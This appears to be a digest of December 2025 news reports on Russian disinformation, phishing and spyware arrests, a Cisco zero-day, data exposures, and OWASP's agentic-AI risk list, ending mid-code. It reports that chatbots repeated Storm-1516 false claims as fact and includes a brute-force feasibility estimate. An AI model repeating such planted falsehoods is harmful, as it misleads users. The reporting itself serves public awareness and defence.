One operation in particular, dubbed by Microsoft as Storm-1516, has emerged as the most prolific and rapidly expanding of the various operations, NewsGuard found. The campaign is known for generating and spreading false claims accusing Ukraine and its allies of corruption and other illegal acts, employing AI-enabled websites, deepfake videos, and inauthentic X accounts. False claims by the campaign often reach millions of views on social media.
RT and Sputnik, the Kremlin’s primary state-funded outlets aimed at a global audience, have long been at the heart of Russia’s propaganda efforts. However, NewsGuard found that in 2025, RT and Sputnik together spread just 15 false claims about the war — compared to 24 created and spread by Storm-1516 alone. NewsGuard sent emails to RT and Sputnik seeking comment on state media’s influence compared to Storm-1516 but did not receive a response.
Russia’s other major foreign influence operations include Matryoshka, a campaign known for mass-creating fake news reports appropriating the branding of credible news outlets, and the Foundation to Battle Injustice, a self-styled human rights organization that publishes “investigations” accusing Ukraine and its allies of human rights abuses. False claims by these campaigns are typically amplified by the Kremlin’s vast disinformation ecosystem, which includes the Pravda network, which encompasses 280 sites identified by NewsGuard that republish Russian propaganda in large volume in dozens of languages.
Nearly four years into the war in Ukraine, NewsGuard has debunked 44 false claims about the war emanating from Storm-1516, compared to 25 false claims from Matryoshka and six by the Foundation to Battle Injustice. These figures are derived from NewsGuard’s proprietary database of False Claims Fingerprints, a continuously updated datastream of provably false claims and their debunks.
Moreover, Storm-1516 has been steadily increasing its output since its inception in 2023. NewsGuard found that six of its false claims emerged from August 2023 to January 2024, 14 from February 2024 to January 2025, and 24 from February 2025 to mid-December 2025, making the campaign the fastest-growing source of false claims about the war monitored by NewsGuard.
Storm-1516 overtook the combination of RT and Sputnik in 2025 as purveyors of false information, according to NewsGuard’s database.
The rise of Storm-1516 as a source of false information about the war suggests that the Kremlin is increasingly relying on covert influence operations — rather than its state-owned media, which are sanctioned and banned in Europe and the U.S. — to spread false claims. Operations like Storm-1516, which are not officially state-owned media, are not typically subject to sanctions, although companies and individuals associated with them sometimes are. (More on this below.)
Moscow is set to spend $1.77 billion on state media in 2026, with $388 million reserved for RT, marking “a new all-time high,” the independent news agency the Moscow Times reported. Sputnik’s budget is unclear, and the amount spent by the Kremlin on its covert operations is also unknown.
FAKES PUSHING FAKES, THANKS TO AI
Thanks to AI tools, the influence campaigns outside of state media appear to be able to produce and propagate false claims at far greater speed and volume, and reach more viewers. Storm-1516 published five false claims about Ukraine in November 2025 alone, which spread in 11,900 articles and posts on X and Telegram, generating 43 million views.
AI appears to be a key factor enabling Storm-1516 to increase its productivity and effectiveness. When the campaign began in late 2023, it initially posted videos to YouTube of real people posing as whistleblowers denouncing corruption by Zelensky. By early 2024, it had begun using AI-generated personas in its “whistleblower” videos and planting its false claims on a network of hundreds of AI-enabled news sites. With names like BostonTimes.org, SanFranChron.com, and LondonCrier.com, the sites came complete with AI-generated logos and used AI to rewrite and automatically publish content from other news outlets.
THE HAND OF DOUGAN
Storm-1516 includes the efforts of John Mark Dougan, a former U.S. Marine and Florida deputy sheriff who fled to Russia in 2016 after his home was raided by the FBI for allegedly leaking confidential information about local officials. In 2018, Palm Beach County prosecutors charged Dougan with wiretapping and extortion, officially making him a fugitive.
In conversations with NewsGuard, Dougan has consistently denied having any links to the Russian government. For example, when NewsGuard asked Dougan in October about his involvement with 139 French-language websites making false claims about President Macron, Dougan told us on Signal, “I’ve never heard of those sites. Still, I have no doubt [about] the accuracy and quality of the news they report.”
In October 2024, The Washington Post reported that Dougan was provided funding by the GRU, Russia’s military intelligence service, and directed by Valery Korovin, director of the Russian think tank Center for Geopolitical Expertise. The Post reported that the GRU paid Dougan to create and manage an AI server in Russia.
In December 2025, the European Union added Dougan to a new sanctions list, making him the first American to be sanctioned for allegedly running influence operations with the goal of “influenc[ing] elections, discredit[ing] political figures and manipulat[ing] public discourse in Western countries.” Eleven other individuals were also sanctioned for online influence operations. Asked over messaging app Signal about his role in Storm-1516 and how the campaign was able to increase its output in 2025, Dougan said in a Dec. 23, 2025, message, “Storm 1516? Never heard of them. Sorry.”
CAPITALIZING ON CORRUPTION
False claims generated or pushed by Storm-1516 often accuse Ukrainian President Volodymyr Zelensky and other Ukrainian officials of using Western aid money to make lavish purchases of properties, cars, and other luxury items. More than the other Russian operations, NewsGuard found that Storm-1516 has ramped up its operations in recent months, apparently seeking to capitalize on negative press linked to an ongoing corruption scandal in Ukraine and growing pressure from the Trump administration for Ukraine to make concessions to Russia.
When Ukraine’s National Anti-Corruption Bureau (NABU) announced in mid-November that it was investigating a $100 million embezzlement scheme in Ukraine’s energy sector, Storm-1516 jumped at the opportunity to spread false claims implicating Zelensky in the scandal. (Zelensky has not been indicted or directly implicated in accusations of corruption.)
For example, on Dec. 10, 2025, X accounts associated with Storm-1516 published a video modeled on the style of videos from NABU and the Specialized Anti-Corruption Prosecutor’s Office (SAP), even displaying the agencies’ logos at the start. The video claimed that anti-corruption investigators searching the office of Andriy Yermak, Zelensky’s former chief of staff, had found $14 million in cash, records of $2.6 billion in offshore bank transfers, and a number of foreign passports belonging to Zelensky.
A December 2025 Storm-1516 campaign made false claims, capitalizing on an ongoing corruption probe. (Screenshots via NewsGuard)
“NABU discovered a collection of foreign passports during a court authorized search of presidential chief of staff Andriy Yermak’s office in Kyiv,” the video stated, displaying images of apparent Israeli and Bahamian passports featuring Zelensky’s face and information.
The NABU/SAP video is a fabrication, and does not appear on any of NABU’s or SAP’s official social media channels or websites. There is no evidence that Zelensky or Yermak have passports of other countries.
Nevertheless, the claim spread in 4,300 posts on X and Telegram, gaining more than 4 million views. For example, a Dec. 11, 2025, X post of the video by @aleksbrz11, a pro-Kremlin account with a profile picture showing a fighter for the former Russian mercenary Wagner group, gained 1.8 million views and 1,800 reposts in one day.
IMPERSONATING CREDIBLE NEWS OUTLETS
In April 2025, the campaign began impersonating credible news outlets, publishing a video bearing the logo of the London-based tabloid The Sun that claimed Ukrainian first lady Olena Zelenska had purchased a dress previously belonging to Princess Diana for $2.9 million. Since then, NewsGuard has found, the campaign has impersonated nine credible news outlets to spread false claims, creating websites and videos imitating the Ukrainian news site The Kyiv Independent, Saudi news site Al Arabiya, investigative outlet Bellingcat, and French public TV broadcaster France Télévisions, among others.
In November 2025, Storm-1516 created the website PageSix.now, a site resembling PageSix.com, an offshoot of the gossip section of the New York Post, to plant a false story that Zelensky bought a $29 million New York townhouse belonging to former actor and comedian Bill Cosby. The claim gained 5,087 posts and 19.8 million views.
Storm-1516 created a website imitating PageSix.com, the site of the gossip section of the New York Post. (Screenshot via NewsGuard)
Beyond using AI tools to advance its false narratives, Storm-1516’s efforts have an afterlife: they tend to infect top AI models, creating another way for the claims to infiltrate the global media ecosystem.
NewsGuard’s regular audits of the leading AI chatbots have repeatedly found that they are vulnerable to repeating false claims originating with Storm-1516. For example, in a March 2025 audit, NewsGuard prompted the chatbots with the false claim that Ukrainian fighters were filmed burning an effigy of Donald Trump, which was based on a staged video produced by Storm-1516.
Asked, “Did fighters of the Azov battalion burn an effigy of Trump?” four of the chatbots repeated the claim as fact, citing articles from the Pravda network.
The office of the President of Ukraine, the Ukrainian National Security and Defense Council, and the Ukrainian Center for Countering Disinformation did not respond to NewsGuard’s requests for an interview.
Edited by Dina Contini and Eric Effron
Editor’s Note: This story was updated on Dec. 23, 2025, to add a comment from John Mark Dougan.
futurism.com
Joe Wilkins
Correspondent
A hacker found a way into the backend of AI startup Doublespeed, which offers customers access to a massive phone farm network.
Back in October, word started making the rounds of an AI startup called Doublespeed. Backed by venture capital firm Andreessen Horowitz, Doublespeed offers customers a unique service: access to a massive phone farm that could be used to operate hundreds of AI-generated social media accounts.
Now, 404 Media reports in an explosive scoop that Doublespeed has been hacked. This wasn’t just one account associated with the startup, but the entire backend used to manage its phone farm — so it provides an extraordinary glimpse at how the service is actually being used to manipulate social media at scale.
Speaking to 404 on condition of anonymity, the hacker said they can “see the phones in use, which manager [computers controlling the phones] they had, which TikTok accounts they were assigned, proxies in use (and their passwords), and pending tasks. As well as the link to control devices for each manager.”
The hacker also shared a list of over 400 TikTok accounts operated by Doublespeed’s phone farm, about half of which were actively promoting products. Most of them, the publication reports, did so without disclosing that the posts were ads — a direct violation of TikTok’s terms of use, not to mention the Federal Trade Commission’s digital advertising regulations.
While undisclosed ads might seem like small potatoes in the grand scheme of things, they speak to a bleak trend. Not only is Doublespeed a possible breeding ground for disinformation campaigns or financial scams, but it seems to be getting away with its phone farm operation without any pushback from TikTok.
Doublespeed’s TikTok accounts ran a gamut of different cons, promoting language learning apps, supplements, massage products, dating apps and more. One account, operating under the unambiguously human-sounding name of Chloe Davis, had uploaded some 200 posts featuring an AI-generated woman hawking a massage roller for a company called Vibit, 404 reported.
Though the hacker says they reported the vulnerability to Doublespeed on October 31, they note that they still had access to the company’s backend as of the day of 404 Media’s report.
So far, Doublespeed is only active on TikTok, though it has plans to expand to Instagram, Reddit, and X-formerly-Twitter. When it does, it seems all bets are off, with social media engagement, and all the influence it entails, going to the highest bidder.
The Chinese Ministry of State Security intelligence service disclosed in October that the U.S. National Security Agency has been engaged in a three-year cyber campaign to break into the official National Time Service Center.
The center is located in the north-central city of Xian. It provides precision time services that state media say are vital for military systems, communications, finance, electricity, transportation and mapping.
The NSA had no comment on the report, but defense analysts say the Chinese report is a significant clue to one of the most secret programs in support of an advanced form of strategic missile defense called “left of launch.”
Left of launch refers to acting on the timeline before a missile is fired, using tools such as cyberattacks that could cause missiles to blow up in their silos when launch buttons are pushed, special operations commandos, and on-the-ground sabotage once a missile is detected being readied for firing.
The project to conduct prelaunch attacks and sabotage of missile systems has been underway for at least a decade, and its elements are among the U.S. military’s most closely guarded secrets.
Asked recently how left of launch will be used in President Trump’s forthcoming Golden Dome defense system to prevent a missile from being fired, Space Force Gen. Michael A. Guetlein, vice chief of space operations, said cryptically: “Can’t talk about it.”
PNT satellite system
Gaining access to China’s central time system would provide a major advantage to the U.S. military and military intelligence services during a conflict by allowing hackers to disrupt missile strikes before launch or shortly after launch, known as the boost phase.
The time center is a key element of China’s BeiDou satellite navigation system, a copy of the U.S. GPS, which uses more than 35 satellites to provide the People’s Liberation Army with vital PNT — positioning, navigation and timing — for its missile systems.
The satellite system is said to provide “centimeter-level” precision and is linked to the National Time Service Center.
Theoretically, NSA cyber sleuths, by breaching the time center, could have planted malicious software inside the PNT data chain that could then be used for intelligence gathering on missile targets and providing false navigation parameters for missile strikes.
U.S. advanced artificial intelligence technology also could fashion prelaunch disruptions that could retarget Chinese missiles against Beijing.
A Chinese state media report on the NSA cyberattacks stated that control over timing is equivalent to “controlling the heartbeat of modern society.”
“Once the timing system is interfered with or hijacked, the consequences are unimaginable,” the online Chinese communications outlet C114 reported. It noted potential disruptions of financial markets, power grids, rail lines and military systems.
For missile systems, PNT is an essential element for real-time location, direction and precise time data used for accurate targeting, trajectory control and command and control.
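The arithmetic behind that sensitivity is simple: a satellite navigation receiver converts signal travel time into distance at the speed of light, so any clock error maps directly into ranging, and hence position, error:

```python
C = 299_792_458.0  # speed of light in m/s

def ranging_error_m(clock_error_s: float) -> float:
    """Pseudorange error introduced by a clock offset of `clock_error_s` seconds."""
    return C * clock_error_s

microsecond_error = ranging_error_m(1e-6)   # ~300 m of ranging error per microsecond
centimeter_budget = 0.01 / C                # ~33 picoseconds of allowable clock error
```

The "centimeter-level" precision claimed for BeiDou therefore demands timing stability on the order of tens of picoseconds, which is why tampering with a national time service would be so consequential.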
“There’s no doubt that the best time to defeat a missile is before it’s launched,” said Todd Harrison, a defense expert with the American Enterprise Institute. “The most obvious way is to track and destroy the launchers and the command and control infrastructure and sensors that enable them.”
Conducting the attacks is difficult because of the distances involved and the risks of escalation.
Various non-kinetic tools can be used to defeat a missile “kill chain” before launch, including jamming sensors and communications, and cyberattacks on command and control systems, Mr. Harrison said.
Electronic disruptions before launch offer uncertain effectiveness in combat, even when they initially have an impact, because a thinking adversary will adapt and overcome them.
“The question for Golden Dome is how much relative effort the architecture puts toward left of launch versus other phases of flight,” Mr. Harrison said. “Left of launch will surely be part of the approach, but we still don’t know how much emphasis it will garner.”
Sensors and capabilities
Mr. Trump’s executive order on missile defense, signed in January, specifically calls for developing and deploying left-of-launch capabilities for Golden Dome.
The order states that in addition to deploying defenses targeting missiles in midflight and terminal phases, the new system must “defeat missile attacks prior to launch and in the boost phase.”
Gen. Stephen Whiting, commander of U.S. Space Command, said in September that left-of-launch defenses will provide a next-generation missile defense capability.
Prelaunch defenses are needed because enemy missiles are becoming more precise and more lethal, he said at a defense conference.
“We are seeing both the capacity and the capability of the threat missiles we’re now facing rapidly increase,” Gen. Whiting said at the annual Air, Space & Cyber Conference. “Just look over the last 18 months in the Israel-Iran conflict … multiple salvos of missiles, not single-digit missiles, not double-digit missiles. We’re talking triple-digit missile salvos paired with one-way attack drones.”
Gen. Whiting said current missile defenses are capable of providing warning and tracking of traditional ballistic missiles, but newer high-speed hypersonic maneuvering missiles and space-based hypersonic missiles are “incredibly destabilizing.”
“Our missile defenses have done broadly a good job during the most recent conflicts, but most of those are focused on terminal engagement,” the general said.
“We want to be able to push that engagement to the left, and eventually left of launch,” he said.
To conduct such prelaunch strikes, greater sensor integration is needed, and more sophisticated cyberattacks will be used to “drive capabilities that allow us to affect targets before they even begin to launch,” Gen. Whiting said.
Robert Peters, senior research fellow for strategic deterrence at The Heritage Foundation, said one of the more promising elements of the Golden Dome will be deploying better overhead sensors and coupling them with theater defense sensors. The advanced sensors will enhance homeland missile defenses by providing significantly greater awareness of when enemy missiles are being readied for launch, and then provide more accurate data once a missile is fired.
“This better integration of data and sensors greatly increases a state’s ability to intercept missiles before they hit their targets,” Mr. Peters said.
Launch preparations for solid-fuel missiles in silos, such as China’s new fields of more than 350 intercontinental ballistic missiles in western China, will be more difficult to detect before launch.
Mobile ICBMs moved out of garrison in preparation for launch have signatures that can be tracked more easily as part of left-of-launch defenses, Mr. Peters said.
“Golden Dome, if done properly, will invest heavily in these types of sensor architectures, not simply on more and more modern interceptors, as critical as those are,” Mr. Peters said.
Israel’s military conducted a series of left-of-launch strikes on Iranian missiles before the joint U.S.-Israeli bombing raid on Iran’s key nuclear facilities.
The Israel Defense Forces released videos of airstrikes on several Iranian mobile missiles that were blown up before they could be fired in retaliatory attacks.
Israeli forces also conducted sabotage operations inside Iran. They neutralized some key missile technicians in the days before the June raid on three nuclear facilities, according to an Israeli think tank report.
In addition to better sensors and increased cyberattack capabilities, special operations forces also will be developed for prelaunch strikes on targets.
Left-of-launch options
Lt. Gen. Sean Farrell, deputy commander of U.S. Special Operations Command, said special operations commandos are working on left-of-launch missile defense capabilities for missiles and drones.
“We have been working left of launch on behalf of the [Defense] Department to try to understand how we can get after the threats before they become a threat,” Gen. Farrell said at the conference with Gen. Whiting. “I think a lot of that will translate as well if we’re able to synchronize and plan together at the strategic level on where we can bring left-of-launch attention to a layered approach to homeland defense.”
The ultimate goal of the layered and integrated missile defense is to deploy an array of forces across all military domains that can detect, disrupt and potentially stop missile threats before they emerge.
Left-of-launch capabilities have been a topic within the Pentagon since at least 2014, when a memorandum from Chief of Naval Operations Adm. Jonathan Greenert and Army Chief of Staff Gen. Ray Odierno to the secretary of defense was disclosed, warning that missile defense spending was “unsustainable” because of sharp defense cuts.
The two military leaders called for building more cost-effective left-of-launch capabilities.
Defense officials at the time said the research for left of launch included non-kinetic weapons, such as cyberattacks and electronic warfare, including electromagnetic pulse attacks against missile command and control systems.
These weapons would be used after missile launch preparations are detected. They would disrupt or disable launch controls or send malicious commands to cause the missiles to explode on their launchers.
In 2016, Adm. William Gortney, then commander of U.S. Northern Command, stated in prepared congressional testimony that most missile defenses are designed to intercept missiles after launch, using ground-based interceptors, mobile regional defenses and ship-based anti-missile systems.
“We need to augment our defensive posture with one that is designed to defeat ballistic missile threats in the boost phase as well as before they are launched, known as ‘left of launch,’” Adm. Gortney said.
Other potential boost-phase defenses could include high-powered lasers deployed on drones or aircraft that can strike missiles just after launch.
All current missile defense systems use kinetic kill interceptors that require precision targeting data to knock out high-speed warheads. They include Patriot, Terminal High Altitude Area Defense (THAAD), the large Ground-Based Interceptors in Alaska and California, and the Aegis missile defense system, based mostly on ships and at several ground locations.
The Golden Dome will deploy space-based interceptors for the first time, providing greater coverage against missile threats.
Kenneth Todorov, former deputy director of the Missile Defense Agency and now vice president at Northrop Grumman Missile Defense Solutions, said the company is working on left-of-launch capabilities and counter-hypersonic missile efforts.
“With decades of experience supporting mission-critical defense programs across the entire kill chain, the company is bringing to bear a portfolio of advanced, innovative capabilities from left of launch, through detection and tracking, all the way to assessment of kill, delivering mission agility in addressing the evolving hypersonic threat,” Mr. Todorov said on the Northrop website.
Patrycja Bazylczyk, associate director of the Missile Defense Project at the Center for Strategic and International Studies, said left-of-launch defenses include a broad category of kinetic and non-kinetic efforts to counter enemy launches. They can include strikes on missile launchers, jamming enemy communications or infiltrating a missile factory.
“Left-of-launch efforts are not alternatives to active missile defenses; they work in tandem, allowing U.S. forces to more effectively counter enemy action rather than merely respond to it,” Ms. Bazylczyk said.
bleepingcomputer.com
By Bill Toulas
December 19, 2025
The Nigerian police have arrested three individuals linked to targeted Microsoft 365 cyberattacks via Raccoon0365 phishing-as-a-service.
The attacks led to business email compromise, data breaches, and financial losses affecting organizations worldwide.
The law enforcement operation was possible thanks to intelligence from Microsoft, shared with the Nigeria Police Force National Cybercrime Centre (NPF–NCCC) via the FBI.
The authorities identified individuals who administered the phishing toolkit ‘Raccoon0365,’ which automated the creation of fake Microsoft login pages for credential theft.
The service, which was responsible for at least 5,000 Microsoft 365 account compromises across 94 countries, was disrupted by Microsoft and Cloudflare last September.
It is unclear if the disruption operation helped identify those behind Raccoon0365 in Nigeria.
BleepingComputer contacted Microsoft for clarification, but a comment wasn't immediately available.
“Acting on precise and actionable intelligence, NPF–NCCC operatives were deployed to Lagos and Edo States, leading to the arrest of three suspects,” reads the police’s announcement.
“Search operations conducted at their residences resulted in the recovery of laptops, mobile devices, and other digital equipment, which have been linked to the fraudulent scheme after forensic analysis.”
One of the arrested suspects is an individual named Okitipi Samuel, also known online as “RaccoonO365” and “Moses Felix,” whom the police believe is the developer of the phishing platform.
Samuel operated a Telegram channel where he sold phishing kits to other cybercriminals in exchange for cryptocurrency, while he also hosted the phishing pages on Cloudflare using accounts registered with compromised credentials.
The Telegram channel counted over 800 members around the time of the disruption, and the reported access fees ranged from $355/month to $999/3 months.
Cloudflare estimates that the service is used primarily by Russia-based cybercriminals.
Regarding the other two arrested individuals, the police stated they have no evidence linking them to the creation or operation of Raccoon0365.
The person Microsoft previously identified as the leader of the phishing service, Joshua Ogundipe, is not mentioned in the police's announcement.
techcrunch.com
Lorenzo Franceschi-Bicchierai
12:15 PM PST · December 19, 2025
On Wednesday, Cisco revealed that a group of Chinese government-backed hackers is exploiting a vulnerability to target its enterprise customers who use some of the company’s most popular products.
Cisco has not said how many of its customers have already been hacked or how many may be running vulnerable systems. Now, security researchers say hundreds of Cisco customers could potentially be hacked.
Piotr Kijewski, the chief executive of the nonprofit Shadowserver Foundation that scans and monitors the internet for hacking campaigns, told TechCrunch that the scale of exposure “seems more in the hundreds rather than thousands or tens of thousands.”
Kijewski said the foundation was not seeing widespread activity, presumably because “current attacks are targeted.”
Shadowserver has a page where it’s tracking the number of systems that are exposed and vulnerable to the flaw disclosed by Cisco, officially tracked as CVE-2025-20393. The vulnerability is known as a zero-day because attackers exploited the flaw before the company had time to make patches available. As of press time, India, Thailand, and the United States collectively have dozens of affected systems within their borders.
Censys, a cybersecurity firm that monitors hacking activities across the internet, is also seeing a limited number of affected Cisco customers. According to a blog post, Censys has observed 220 internet-exposed Cisco email gateways, one of the products known to be vulnerable.
In its security advisory published earlier this week, Cisco said that the vulnerability is present in software found in several products, including its Secure Email Gateway and its Secure Email and Web Manager.
Cisco said these systems are only vulnerable if they are reachable from the internet and have its “spam quarantine” feature enabled. Neither condition holds by default, per Cisco, which would explain why relatively few vulnerable systems appear to be exposed on the internet.
Cisco did not respond to a request for comment asking whether the company could corroborate the numbers seen by Shadowserver and Censys.
The bigger problem with this hacking campaign is that there are no patches available. Cisco recommends that customers wipe and “restore an affected appliance to a secure state,” as a way to remediate any breach.
“In case of confirmed compromise, rebuilding the appliances is, currently, the only viable option to eradicate the threat actors persistence mechanism from the appliance,” the company wrote in its advisory.
According to Cisco’s threat intelligence arm Talos, the hacking campaign has been ongoing since “at least late November 2025.”
bbc.com
Sam Francis
Political reporter
19.12.2025
The trade minister says information was accessed and an investigation has been launched.
Government data has been stolen in a hack, though officials believe the risk to individuals is "low", a minister has said.
Trade Minister Chris Bryant told BBC Breakfast "an investigation is ongoing" into the hack, adding that the security gap was "closed pretty quickly".
A Chinese-affiliated group is suspected of being behind the attack, but Bryant said investigators "simply don't know as yet" who is responsible.
The data is understood to have been held on systems operated on the Home Office's behalf by the Foreign Office, whose staff detected the incident.
"We think that it's a fairly low-risk that individuals will have been compromised or affected," Bryant said.
It comes after the Sun newspaper reported that hackers affiliated with the Chinese state accessed the data in October, with the targeted information possibly including visa details.
The incident has been referred to the Information Commissioner's Office.
UK intelligence agencies have warned about increasing, large-scale espionage from China, using cyber and other means, and targeting commercial and political information.
The cyber-agency GCHQ said last year that it was devoting more resources to counter threats from China than any other nation.
"Government facilities are always going to be potentially targeted," Bryant said on Friday.
"We are working through the consequences of what this is."
"This is a part of modern life that we have to tackle and deal with," Bryant added, pointing to major hacks in recent years at Jaguar Land Rover, Marks & Spencer and the British Library.
Confirmation of a hack by a Chinese state group would be awkward for the government ahead of a planned visit to Beijing next year by Sir Keir Starmer, the first by a UK prime minister since 2018.
The Labour government has said it is important to engage with China as it cannot be ignored on trade, climate change and other major issues, but face-to-face meetings also provide a forum for robust exchanges about issues affecting UK security.
The Chinese government has consistently denied it backs cyber-attacks targeting the UK.
Last year, responding to the UK government's National Security Strategy, a spokesperson for the Chinese embassy in London said "accusations such as Chinese espionage, cyber-attacks, and transnational repression against the UK are entirely fabricated, malicious slander".
Earlier this month, Sir Keir said UK government policy towards China could not continue to blow "hot and cold".
Failing to navigate a relationship with China, he said, would be a "dereliction of duty" when China is a "defining force in technology, trade and global governance".
Building a careful relationship would instead bolster the UK's place as a leader on the international stage and help secure UK national interests, Sir Keir said, while still recognising the "reality" that China "poses national security threats".
commsrisk.com
By Eric Priezkalns
15 Dec 2025
Serbia’s Ministry of Internal Affairs has issued a statement and photographs relating to the arrest of two Chinese nationals who sent smishing SMS messages from a fake base station. The messages included links to websites which impersonated reputable public and private sector organizations including mobile operators. The websites asked for the details of the payment cards belonging to victims. The information obtained from victims was then used to purchase goods and services abroad.
This appears to be the first reported case of its type in Serbia. Nothing was said about the location in Serbia where the men were caught but the police reportedly searched multiple apartments and business premises. The two arrested men, aged 33 and 34, were said to be working for an organized criminal gang that operates across ‘several’ European countries.
Regular readers of Commsrisk may also notice a telltale sign that these criminals are connected to SMS blasting smishers found elsewhere. Photographs of the equipment found in their car show they possessed a distinctive orange DC-AC power converter of a type also used in conjunction with SMS blasters seized in many other countries. Scroll down for the photographs of the equipment found in Serbia.
Commsrisk uses AI-powered search to maintain the most comprehensive global map of reported SMS blasters. This incident has been added to the map.
Photographs of the seized equipment released by the Serbian government are reproduced below, along with a video of the two men being arrested and the announcement posted to the official Instagram account of the Serbian Ministry of Internal Affairs.
therecord.media
Forensic researchers at Reporters Without Borders (RSF) have found a previously unknown spyware tool on a Belarusian journalist’s phone, the nonprofit said Wednesday.
The organization said it believes the spyware has been in use since at least 2021 based on its analysis comparing samples on an antivirus platform. Dubbed ResidentBat, the spyware can access call logs, SMS and encrypted app messages, microphone recordings, locally stored files and screen captures. It is used to target Android phones.
The journalist and RSF believe the spyware was installed while the journalist was detained by the Belarusian KGB. The phone was seized during questioning and authorities at one point forced the journalist to unlock the phone, RSF said in a press release.
Similar examples of authoritarian regimes installing spyware on journalists' phones while they are being questioned by police or security services have occurred recently in Serbia and Kenya.
“Growing list of cases where authoritarian regimes use detention to implant spyware on phones,” John Scott-Railton, a digital forensic researcher at Citizen Lab, said in a social media post. “Important investigation and reminder that dictators don't always need zero-days.”
In December 2024, Citizen Lab reported it had found spyware secretly placed on a phone belonging to a Russian programmer accused of supporting Ukraine after he was released from custody by Russian authorities.
The recent infection targeting the Belarusian journalist came to light after antivirus software on their phone flagged “suspicious components” a few days after their detention. The journalist contacted the Eastern European nonprofit RESIDENT.NGO, which analyzed the phone with RSF.
“By deploying surveillance technologies such as ResidentBat, the Belarusian state is pursuing a deliberate strategy of repression against independent journalism,” Antoine Bernard, RSF’s director of advocacy and assistance, said in a statement. “The systematic invasion of their private and professional lives amounts to a direct and unlawful assault on press freedom and fundamental rights.”
Belarus ranks 166th out of 180 countries and territories on a press freedom survey conducted by the organization.
RSF said it has made Google aware of its findings, and the tech giant plans to send a threat notification to all Google users identified as targets of the spyware campaign.
techcrunch.com
Lorenzo Franceschi-Bicchierai
7:37 AM PST · December 12, 2025
Hama Film makes photo booths that upload pictures and videos online. But its back-end systems have a simple flaw that allows anyone to download customer pictures.
A company that makes photo booths is exposing pictures and videos of its customers online thanks to a simple flaw in its website where the files are stored, according to a security researcher.
The researcher, who goes by Zeacer, alerted TechCrunch to the security issue in late November after reporting the vulnerability in October to Hama Film, the photo booth maker with a franchise presence in Australia, the United Arab Emirates, and the United States, but he did not hear back.
Zeacer shared with TechCrunch a sample of pictures taken from Hama Film’s servers, which showed groups of visibly young people posing in photo booths. Hama Film’s booths not only print out photos like a typical photo booth, but also upload customers’ photos to the company’s servers.
Vibecast, which owns Hama Film, has yet to respond to his messages alerting the company of the issues. Vibecast also hasn’t responded to several requests for comment from TechCrunch, nor did Vibecast’s co-founder Joel Park respond to a message we sent via LinkedIn.
As of Friday, the researcher said the company has still not fully resolved the security flaw and continues to expose customers’ data. As such, TechCrunch is withholding specific details of the vulnerability from publication.
When Zeacer first found this flaw, he noted that it appeared that photos were deleted from the photo booth maker’s servers every two to three weeks.
Now, he said, the pictures stored on the servers appear to get deleted after 24 hours, which limits the number of pictures exposed at any given time. But a hacker could still exploit the vulnerability he discovered each day and download the contents of every photo and video on the server.
Before this week, Zeacer said at one point he saw more than 1,000 pictures online for the Hama Film booths in Melbourne.
This incident is the latest example of a company that, at least for a time, was not implementing certain basic and widely accepted security practices, such as rate-limiting. Last month, TechCrunch reported that government contractor giant Tyler Technologies was not rate-limiting its websites used for allowing courts to manage their jurors’ personal information. This meant anyone could break into any juror’s profile by running a computer script capable of mass-guessing their date of birth and their easy-to-guess numerical identifier.
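To illustrate why a missing rate limit matters, the rough sketch below enumerates the guess space for a date of birth paired with a short numeric identifier. All parameters here (age bounds, a 4-digit ID, request rate) are hypothetical illustrations, not details of the actual Tyler Technologies system:

```python
# Illustrative only: estimate the brute-force search space for a
# date-of-birth plus short numeric ID, assuming no rate limiting.
from datetime import date, timedelta

def count_birthdates(min_age: int = 18, max_age: int = 90,
                     today: date = date(2025, 12, 1)) -> int:
    """Count every plausible date of birth within hypothetical age bounds."""
    start = today - timedelta(days=max_age * 365)
    end = today - timedelta(days=min_age * 365)
    return (end - start).days + 1  # inclusive range of candidate dates

dobs = count_birthdates()   # roughly 26,000 candidate dates
ids = 10_000                # hypothetical 4-digit identifier
total = dobs * ids

# At a modest 100 unthrottled requests per second, a script could sweep
# this entire space in about a month — and individual hits land far sooner.
print(dobs, total)
```

Even a coarse per-IP rate limit or account lockout pushes the same sweep from weeks into decades, which is why rate limiting is considered a baseline control for endpoints guarding personal data.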
News provided by
OWASP
Dec 10, 2025, 03:03 ET
WILMINGTON, Del., Dec. 10, 2025 /PRNewswire/ -- The OWASP GenAI Security Project (genai.owasp.org), a leading global open-source and expert community dedicated to delivering practical guidance and tools for securing generative and agentic AI, today released the OWASP Top 10 for Agentic Applications, a key resource to help organizations identify and mitigate the unique risks posed by autonomous AI agents.
Following more than a year of research, review and refinement, this Top 10 list reflects a culmination of input from over 100 security researchers, industry practitioners, user organizations and leading cybersecurity and generative AI technology providers. The result is not only a list of risks and mitigations, but a suite of resources designed for practitioners providing data-driven guidance.
The framework was further evaluated by the GenAI Security Project's Agentic Security Initiative Expert Review Board, which includes representatives from recognized bodies around the world such as NIST, the European Commission, and the Alan Turing Institute, among others. A full list of contributing organizations can be found here.
"This new OWASP Top 10 reflects incredible collaboration between AI security leaders and practitioners across the industry," said Scott Clinton, the OWASP GenAI Security Project's Co-Chair, Board Member, and Co-Founder. "As AI adoption accelerates faster than ever, security best practices must keep pace. The community's responsiveness has been remarkable, and this Top 10, along with our broader open-source resources, ensures organizations are better equipped to adopt this technology safely and securely."
Agent Behavior Hijacking, Tool Misuse and Exploitation, and Identity and Privilege Abuse are among the threats highlighted in the Top 10, showcasing how attackers can subvert agent capabilities or their supporting infrastructure. As agentic systems become increasingly capable across industries, incidents involving them are rising, elevating the need for these new resources.
"Companies are already exposed to Agentic AI attacks - often without realizing that agents are running in their environments," said Keren Katz, Co-Lead for OWASP's Top 10 for Agentic AI Applications and Senior Group Manager of AI Security at Tenable. "While the threat is already here, the information available about this new attack vector is overwhelming. Effectively protecting a company against Agentic AI requires not only strong security intuition but also a deep understanding of how AI agents fundamentally operate."
"Agentic AI introduces a fundamentally new threshold of security challenges, and we are already seeing real incidents emerge across industry," said John Sotiropoulos, GenAI Security Project Board member, Agentic Security Initiative and Top 10 for Agentic Applications Co-lead, and Head of AI Security at Kainos. "Our response must match the pace of innovation, which is why this Top 10 focuses on practical, actionable guidance grounded in real-world attacks and mitigations. This release marks a pivotal moment in securing the next generation of autonomous AI systems."
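One common mitigation for tool misuse and privilege abuse is to gate every tool call an agent proposes behind an explicit, deny-by-default policy. The sketch below is a minimal illustration of that idea; the tool names, arguments, and policy rules are hypothetical and are not taken from the OWASP document:

```python
# Illustrative sketch: gate an agent's proposed tool calls behind an
# explicit allow-list plus per-tool argument checks (deny by default).
from dataclasses import dataclass, field

@dataclass
class ToolPolicy:
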